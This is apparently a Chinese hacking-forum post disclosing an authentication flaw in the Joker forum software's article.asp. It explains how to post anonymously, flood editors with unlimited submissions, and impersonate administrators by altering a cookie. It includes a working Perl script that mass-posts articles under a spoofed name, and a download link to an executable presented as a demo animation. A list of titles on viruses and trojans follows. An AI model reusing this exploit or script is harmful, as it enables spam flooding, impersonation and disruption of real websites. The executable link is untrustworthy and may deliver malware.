乔客论坛存在的安全隐患
这个漏洞出现在:个人专栏-发表我的文章,当用户登陆后,点发表我的
文章时,有个文本框出现的是你的登陆名,发表文章是以你的
名义的,但由于这个article.asp缺少认证,我们不必登陆直接提交如下url,
这时你可以匿名发表文章给各个主编:
http://127.0.0.1/1/article.asp?action=add
这样在查看数据库中的article_add表中的username栏时为空,也就是不能只
知道是谁发的,即使你发表一些过激的言论管理员也不能拿你
怎么样,不能禁用你的帐号。
要命的是程序对用户发表文章的间隔也没有限制,我写了个程序,是在本
机测试的,一分钟能刷几百封,而且是匿名的,如果放在十台机上
跑一天,你算一下在文栏管理-网友发布中要收到多少投稿,这不是影响了文
栏主编的正常工作。
更要命的是还有一招借刀杀人,username栏时不为空,而是用别人的名字
,这个方法是以你的名义先登陆,然后修改cookie中的用户名
为你要冒充发言的人,然后直接提交如下url:
http://127.0.0.1/1/article.asp?action=add 其中的127.0.0.1/1/要改为
网站article.asp的真实路径,这样你可以看到文本框中出现的
就是你要冒充的人的名字了,查看数据库中的article_add表中的username栏
就是这个人说的了,你可以冒充管理员给各文栏主编下命令了。
我做了个演示动画,大家可以下一个看看,动画也演示了炸弹的威力!
下载地址:
http://members.lycos.co.uk/zhuoqing/king.exe
注意: 一定要用flashget下,ie下不了
已下是动画教程中涉及到的exploit
#!/usr/bin/perl
# code by pinkeyes
print "pinkeyes is your best friend\n";
print "welcome to 海洋顶端网,and http://xiaomutou.51.net/bbs/\n";
use http::request::common;
use http::response;
use lwp::useragent;
$ua = new lwp::useragent;
$argc = @argv;
if ($argc != 1) {
print "usage: $0 <times>";
exit(1);
}
$times = shift;
for($k=1;$k<=100 * $times;$k++){
for ($j=1;$j<=$times;$j++){
for ($i=1;$i<=$times;$i++) {
$response = $ua->request(post http://127.0.0.1//1//article.asp?action=chk,
[
csid => "$j-$i",
topic => 漏洞演示,
word =>fire in the hole,
login_username => pinkeyes
]
);
if ($response->content =~ /已成功发布了一篇文章/) {
print "mail $i reg succeed!\n";
}
else {
print "mail $i reg failed!\n";
}
}
}
}
- · 破解搜毒网会员管理程序
- · 漂亮但不安全的CTB
- · 利用SQL Injection With Access漏洞猜测用户和密码的东东
- · 接踵而至的LB5K论坛漏洞
- · 几个VBB的跨站脚本执行漏洞小结
- · CMOS开机密码解密集锦
- · Win2000的系统安全防范对策
- · 回眸一看 操作系统发展的历程
- · 小木马cnc源代码及开发文档
- · 一个主引导区病毒的分析
- · 一个简单的文件型病毒程序
- · 一个写硬盘的VBS脚本程序
- · unix系统病毒概述
- · WinNT下使用匿名获得admin权限的几个方法
- · 配置 VMware通过令牌访问LAN
- · Debug 使用简介
- · IE即可轻松远程控制对方电脑
- · 如何利用OutLook漏洞编写病毒脚本
- · “混客绝情炸弹”源代码(1)及手工清除
- · “求职信”病毒/蠕虫行为深入分析
- · 编写感染COM与EXE文件的病毒的样例程序
- · 在Win 2003中配置ASP.net环境
- · 将病毒斩草除根
- · 手机病毒
- · 使用TCP/IP协议栈指纹进行远程操作系统辨识
- · 安全维护 IIS asp 站点的高级技巧
- · 防止内部IP地址泄漏的2种方法
- · 网络常见攻击与防范完全手册
- · Windows NT2000下的硬盘锁
- · CIH硬盘数据恢复方法与实例
- · 清除双关联木马“聪明基因”
- · 104种木马手工清除方法
- · 如何隐藏程序的运行
- · 六十四、WINOWS NT4.0下的网络安全性
- · 六十二、从DOS直接入网NT
- · 六十一、NT网的无盘工作站远程登陆
- · 六十、Windows NT4.0网络中漫游用户配置文件的建立
- · 五十九、配置广域网中的Windows NT
- · 五十八、NT Server用作Internet的网关
- · 五十六、 NT网卡和Novell网卡互用
- · 五十四、如何使NT4.0支持你的调制解调器
- · 本地攻击者利用FreeBSD4.3设计漏洞取得系统特权
- · 计算机网络系统安全漏洞分类研究
- · 利用万象来控制整个网吧
- · WIN2000的输入法入侵
- · 傲者TXT炸弹(标准版)
- · 主页木马的制作方法
- · IIS UNICODE Bug
- · BBS3000漏洞
- · CGI漏洞集锦
- · SNMP漏洞威胁网络安全
- · 安全专家欲以黑制黑
- · 用net命令使局域网文件批量同步更新
- · 安全高招:让溢出攻击远离我们
- · Firefox使用技巧六则
- · 支持Rss,优化速度:傲游1.2.0发布
- · 四十九、从DOS工作站登录NTS4.0服务器
- · 十三、WIN2000下的xcopy可以复制文件的安全设置
- · “网上邻居”如何和平共处?
- · NT的19个秘密武器

